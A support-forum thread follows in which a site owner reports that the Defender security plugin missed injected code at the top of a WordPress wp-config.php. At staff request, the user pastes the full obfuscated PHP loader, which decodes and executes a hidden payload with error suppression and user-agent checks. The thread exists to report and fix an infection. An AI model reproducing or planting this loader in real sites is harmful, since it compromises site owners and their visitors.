Defender cannot see a virus in the wp-config.php

One of are users reported a virus infecting the site.

I checked the wp-config.php and sure enough there was a suspicious php string at the top. I ran the Defender scan and the plugin couldn't see it. In the past the defender has removed php virus text in WordPress files without issue.

I need to know how to stop this happening. Does Defender not protect the config file?

  • Kasia Swiderska

    Hello Barry - DSM,

    Would it be possible you could share that suspicious line of code with us? I will consult that with our developers to see what is going on there.

    Problem with wp-config.php is that it can be very heavily customized (for example WPEngine uses wp-config.php that very very much different than sample wp-config) and also lots of plugins can use own defines there and those defines are not part of the core. So flagging every change that makes it different from default one might cause lots of problems.

    kind regards,
    Kasia

  • Barry - DSM

    Hi Kasia,

    The suspicious code is as follows:
    <?php $tqjzght = 'j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvoduhA x27pd%6<pd%w6Z6<.tr($uas," x72 166 x3a 61 x31")) Ld]55#*<%bG9}:}.}-}!#*<%nk!~!<**qp%!-uyfu%)3oretqrjo($n){return chr(ord($n)-1);} @error_vlbel("", $vltpfnj); $hhasrvl();}}!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.fd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h]281L1#/#M5]DgP5]D6#<%fdy>#]D4]2734]275]y83]248]y83]256]y81]265]y748y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242!-#jt0*?]+^?]_ x5c}X x24<!%tm_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 11cvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2yc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#ce44#)zbssb!>!ssbnpe_GMFT<&w6< x7fw6*CW&:wink:7gj6<*doj%7-gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!if((function_exists(" x6f 142 x5f 163 x74 146 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strs275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55-rr.93e:5597f-s.973:8297f:m)%tjw)# x24#-!#]y38#e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82y]252]18y]#>q%<#762]67y]562]38y]572]"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($ldbqov>*ofmy%)utjm!|!$uas," x66 151 x72 145 x66 157 x78"))) 7fw6* x7f_*#[k2{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuop) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x178}527}88:}334}472 x24<!%ff2!>!bssbz>!fyqmpef)# x24*<!%t::!>! x2]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]vc%}&;ftmbg} x7f;!osvufs}w/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)bssb}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{:wink:gj}l;33bq}k5c%j^ x24- x24tvctus)% x24- x24b<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6or (strstr($uas," x61 156 x64 162 x6f 151mjgk4{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%))udfoopdXA x22)7gj6<*QDUMPT7-NBFSUTLDPT7-UFOJGB)fubf%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%]K6]72]K9]78]K5]53]Kc#<%tpzt%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67yj!<**2-4-bubE{h%)sut+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbutcpV x7C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#f7]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf4 x223}!+!<+{e%%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#vd}R;*msv%)}.;UQPMSVD!-id%)uqpuftmgjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)323ldfid;opjudovg}x;0]=])0#)U! 2hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7w!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]25297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function +upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubnbss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfopjud6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UF#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!372]58y]472]37y]672]48y]#>s%<#462]47hfsq)!sp!*#ojneb#-*f%)sfx-n%)utjm6< x7fw6*CW&:wink:7gj6<*K)ftpmdXA6~6<u%7>/7&6|56A:>:8:expressionless::7#6#)tutjyf439275ttfsqnpdo>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsbbj)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39* x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r xg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:7**111127-K)ebfsX x27u%)7fmjixpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:7k:!ftmf!}Z;^nbsbq% x5cSFWSFT,*j%!-#1]#-bubE{h%)tpqsut>j%msvftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5{66~66* x7f_*#ujojRk3{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< xjpo! x24- x24y7 x24- x24*<! x24- x24{ $bqvlbel = " x63 162 6<**2qj%)hopm3qjA)qj3hopmA x273qj%udovg}{;#)tutjyfopjudovg)!gj!|!*msv%)}k~~~<ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,64Ypp3)%cB%iN}#-! x24/%tmw/ x24)!*72! x27!hmg%)!gj!<2,*j%-#1]etqrjo",str_split("%tjw!>!#]y8238M7]381]211M5]67]452]8%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:expressionless::**t%)m%=*hoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x22l:!}V;3q%}U;y]#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2reporting(0); $vltpfnj = implode(array_map("r8]5]48]32M3]317]445]2199#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%73]y76]252]y85]256]y6g]257]y86]26 x64")) or (strstr($uas," x63 150 x72 2]445]43]321]464]284]364]6]234]342]58]24]31f)fepdof57ftbc x7f!|!*uyfu x2z)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-1 x72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61157 x6d 145")) or (strstr(QIQ&f_UTPIQUUI&e_SEEBFUPNFS&d_SFSFGFSQUUI&c_UOFHBSFTVQUUI&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)!>!#]D6M7]K3#<%yy>#]D6<^#Y# x5cq% x27Y%6<.2]254]y76#<!%w:!>!(%w:!>! x24676<*msv%7-MSV,6<*)ujojR x27id%6< x7fw x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w x5c^>Ew:Qb:Qsvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;g#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c683% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj625]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]x27pd%6<pd%w6Z6<.4hA x27pd%6<pd%w6Z6<.324)% x24- x24y4 x24- x2gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bj%!<***f x27,*e x27,*d x27,*c x27,*b 7~6<Cw6<pd%w6Z6<.5hA v{h19275j{hnpd19275fubmgoj{x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsun>qp%!|Z~!<##!x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe;* x7f!>> x22!pd%)!gj}Z;h!opjdufhfmjg}[;ldpt%}K;ufldpt}X;ms*5! x27!hmg%)!gj!|!*1?hmg%)!gsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x#-%tdz*Wsfuvso!%bss x5csboeq%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdf x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwb-!%w:**<")));$hhasrvl = $bqH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]26<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cqftmbg!osvufs!|ftmf!~<**9.-ovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p+*!*+fepdfe{h+{d%)+opjudovg%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtStapwpyue'; $sywtcn=explode(chr((756-636)),substr($tqjzght,(38292-32272),(234-200))); $hzaasdxp = $sywtcn[0]($sywtcn[(7-6)]); $tnfgelj = $sywtcn[0]($sywtcn[(8-6)]); if (!function_exists('txqltr')) { function txqltr($lvynfuwq, $bkrxnx,$uvxpnnj) { $vmfbukww = NULL; for($nrtdpqjl=0;$nrtdpqjl<(sizeof($lvynfuwq)/2);$nrtdpqjl++) { $vmfbukww .= substr($bkrxnx, $lvynfuwq[($nrtdpqjl*2)],$lvynfuwq[($nrtdpqjl*2)+(5-4)]); } return $uvxpnnj(chr((37-28)),chr((432-340)),$vmfbukww); }; } $tiovrrf = explode(chr((226-182)),'861,44,4408,53,1160,62,539,64,905,56,134,32,1706,41,4251,38,4461,26,1243,39,3566,23,2554,63,211,43,4023,45,3767,30,428,32,4684,32,5141,22,5009,40,113,21,2375,68,2967,49,3276,30,2799,70,5716,47,1789,55,5407,37,3589,34,5801,62,4898,58,4664,20,3429,45,703,28,2050,48,1747,42,3667,40,1670,36,4716,35,3474,56,1282,53,5344,34,2268,36,4800,38,1489,26,5315,29,3623,44,5863,26,0,66,3401,28,3738,29,2869,37,4599,22,4621,21,1222,21,5378,29,1967,20,603,35,2719,36,2755,44,5889,51,1844,51,288,57,5105,36,5190,68,3053,64,2617,53,2942,25,3306,66,677,26,4487,59,4546,53,2304,48,191,20,4332,30,3372,29,2204,64,3117,70,3016,37,5163,27,2141,63,5940,27,1987,63,5570,70,3972,51,5531,39,3913,59,1578,60,2352,23,5258,57,510,29,2443,44,4218,33,2098,43,1922,45,3862,51,3821,41,2906,36,1124,36,460,50,1379,37,1335,44,1638,32,5444,60,5049,23,66,47,3530,36,731,69,1416,28,3707,31,5967,53,4838,60,4090,68,3187,59,4158,60,2670,49,1028,26,2487,67,1075,49,1895,27,4642,22,394,34,1444,45,961,67,166,25,345,49,5763,38,4956,53,3797,24,4068,22,4289,43,5504,27,800,61,5072,33,3246,30,4751,49,638,39,1515,63,4362,46,5640,49,1054,21,5689,27,254,34'); $tkeuma = $hzaasdxp("",txqltr($tiovrrf,$tqjzght,$tnfgelj)); $hzaasdxp=$tqjzght; $tkeuma(""); $tkeuma=(528-407); $tqjzght=$tkeuma-1; ?>

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.